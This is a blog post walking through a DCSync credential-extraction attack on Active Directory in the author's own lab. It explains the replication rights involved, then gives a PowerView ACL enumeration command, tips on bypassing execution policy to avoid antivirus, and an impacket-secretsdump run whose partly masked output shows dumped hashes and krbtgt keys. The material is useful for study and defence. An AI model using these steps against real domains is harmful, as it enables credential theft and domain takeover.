DCSync Attack

January 8, 2024 Exploiting AD

Hello again and let’s take a look at the DCSync attack today. As I composed this blog, I’m performing the attack in my own lab environment.

DCSync Attack Background

Let’s understand the AD Replication before diving into the DCSync Attack. In a real-world scenario, there exist multiple domain controllers (DCs). The presence of multiple DCs across various locations enables the synchronization of policies and authentication rules for each respective location. It is crucial to ensure synchronization among all DCs. This synchronization process is facilitated through the “Microsoft Directory Replication Service Remote Protocol (MS-DRSR).”

To guarantee uniformity in configuration updates for every attribute and object, as well as to prevent perpetual replication loops, Active Directory employs various counters and tables. The segmentation of replication is achieved through the use of naming contexts (NC), also referred to as directory partitions. Within each forest, there are at least three Naming Contexts: i) Domain NC, ii) Configuration NC, and iii) Schema NC. Active Directory additionally supports specialized NCs known as application partitions or non-domain NCs (NDNC). NDNC is utilized by DNS.

Once an attacker has compromised the Windows machine, there are several techniques that the attacker can employ to dump the credentials to escalate the privileges such as LSASS Memory, SAM Database, Cached Domain Credentials or Abusing the Directory Replication permission.

DCSync Attack

DCSync is a technique to extract the credentials from the domain controller. In this attack, an adversary take advantage of Microsoft Directory Replication Service Remote Protocol (MS-DRSR) and request for the replication using the ‘GetNCChanges’ function. In response to this domain replication returns the data including password hashes. The following three rights are needed on the target user account in order to perform the DCSync Attack.

Replication Directory Changes – DS-Replication-Get-Changes
Replication Directory Changes All – DS-Replication-Get-Changes-All
Replication Directory Changes In Filter Set – DS-Replication-Get-Changes-In-Filtered-Set

This attack is associated with Directory Replication Service Remote Protocol Service (MS-DRSR). This Service Can not be disabled. These privilege are limited to “Domain Admins, Enterprise Admin, Domain Controller Group”. Attacker would load the mimikats and run the DCSync command from the ‘lsadump’ module specifying the target domain controller and domain account.

The “DCSync” command in the mimikatz allow an attacker to pretend to be a domain controller and retrieve password hashes from the another domain controller without executing any code on the target. This is possible using the MS-DRSR’s ‘DRSGetNCChanges‘ method that replicates Naming Context (NC) replica on the server.

The NC Replica is a variable containing a tree of objects whose root object is identified by some naming context (NC). The ‘IDL_DRSGetNCChanges’ method replicates updates from an NC replica on the server.

Naming Context – The Naming Context (NC) is a set of objects organized as a tree. It is referenced by a DSName. The DN of the DSName is the distinguishedName attribute of the tree root. The GUID of the DSName is the objectGUID attribute of the tree root.

Attack Scenario and Lab Environment

I was partially struggling running the PowerView.ps1 over the Evil-WinRM and learned that, To run on a machine, start PowerShell with “powershell -exec bypass” or “powershell.exe -nop -exec bypass” or “powershell -ep bypass” and then load the powerview script: PS> Import-Module .\powerview.ps1

In order to perform enumeration, we are going to use PowerView. You can use the above guideline on how to user PowerView properly without getting caught by your local anti-virus tools.

Enumerating and Exploiting DCSync

Import a ‘Recon’ module from the PowerSploit and we can run the following command.

Get-ObjectAcl -DistinguishedName "dc=ringbuffer,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

The Get-ObjectAcl command retrieves the ACLs associated with a specific Active Directory object. The ‘GenericAll’ permission provides all possible rights to the Active Directory Object, while the ‘WriteDacl’ permission grants the rights to modify the discretionary access control list (DACL) for the AD Object.

It’s important to note that our administrator user has the dcsync right enabled. Keep in mind that the ‘Administrator,’ ‘Domain Admins,’ ‘Enterprise Admins,’ and ‘Domain Controller’ accounts have the capability to execute the DCSync attack, allowing them to pull down passwords or hashes. However, Read-Only Domain Controller accounts do not possess these rights.

With the use of Mimikatz, it becomes possible to extract the password hash for the KRBTGT account, facilitating the creation of Kerberos golden tickets. In this scenario, Mimikatz is employed on a Windows server to extract the hash associated with the KRBTGT account.

We can spin up our Kali instance and use the Impacket’s secretdump to obtain the NTLM hash.

┌──(ringbuffer㉿kali)-[~/Downloads]
└─$ impacket-secretsdump -outputfile 'dcsync' 'ringbuffer.local'/'Administrator':'******************'@'ringbuffer.local'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9eee9e94d*****************18
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aa*****************1404ee:cb8*****************0d60f5dc:::
Guest:501:aad3b4*****************ad3b435b51404ee:31d6c**********************************9c0:::
DefaultAccount:503:aa*****************04ee:31d6cfe*****************089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RINGBUFFER\DC$:aes256-cts-hmac-sha1-96:11**********************************078cbea78727b6593725ec5d45
RINGBUFFER\DC$:aes128-cts-hmac-sha1-96:5c***************************************************08ff8e8391e964
RINGBUFFER\DC$:des-cbc-md5:ae6d542f8c261923
RINGBUFFER\DC$:plain_password_hex:b***************************************************************************************************************************************************************************************************************************************************************f
RINGBUFFER\DC$:aad3b435*****************b435b51404ee:e6b22da*****************45f02d24ce:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x40b37be51b98c9444*****************4e8c
dpapi_userkey:0xf1d8975337bd67c3*****************fc8
[*] NL$KM 
 0000   E5 B2 50 19 36 7B 3E 18  75 7C 49 8C 28 BD 0E A9   ..P.1{>.u.R.(...
 0010   8B 23 95 F4 48 7D 4E 78  63 6F 37 6A 69 52 B1 02   .#..W}....7jiR..
 0020   D0 6F 98 16 76 D6 79 C0  CD A8 08 B7 F3 A8 D7 FD   .o..v.y.........
 0030   5D 87 14 DD FA 37 5B 42  02 9C A0 FF 0B B0 B7 C5   ]....7[B........
NL$KM:e5b250***************************************************679c0cda808b7f3a8d7fd*****************0bb0b7c5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b*****************1404ee:cb8a4283854*****************10d60f5dc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b*****************b435b51404ee:9edfe55400a9da**********************************bc5e84:::
ringbuffer.local\w*****************n:1103:aad3b435b51*****************5b51404ee:cb8a4283**********************************dc:::
LAB-FAKEPC$:1105:aad3b**********************************1404ee:e8020b2a**********************************1c0c467a2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:547***************************************************648423ad
Administrator:aes128-cts-hmac-sha1-96:bbe9**********************************587e1d87caa151eb
Administrator:des-cbc-md5:ab6b**********************************0464ec86
krbtgt:aes256-cts-hmac-sha1-96:3b627d5**********************************084a252ce9a6f331f3aa8d8169f5b910e0f7
krbtgt:aes128-cts-hmac-sha1-96:72212e**********************************9e7e36b0b14701ba3c
krbtgt:des-cbc-md5:c710c*****************2f1fb
DC$:aes256-cts-hmac-sha1-96:11dea0b8c907d05ef48080f**********************************78727b6593725ec5d45
DC$:aes128-cts-hmac-sha1-96:5c0d05a231*****************f8e8391e964
DC$:des-cbc-md5:8a452967fe979216
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

That’s all.

Thank you for reading and let me know your thoughts.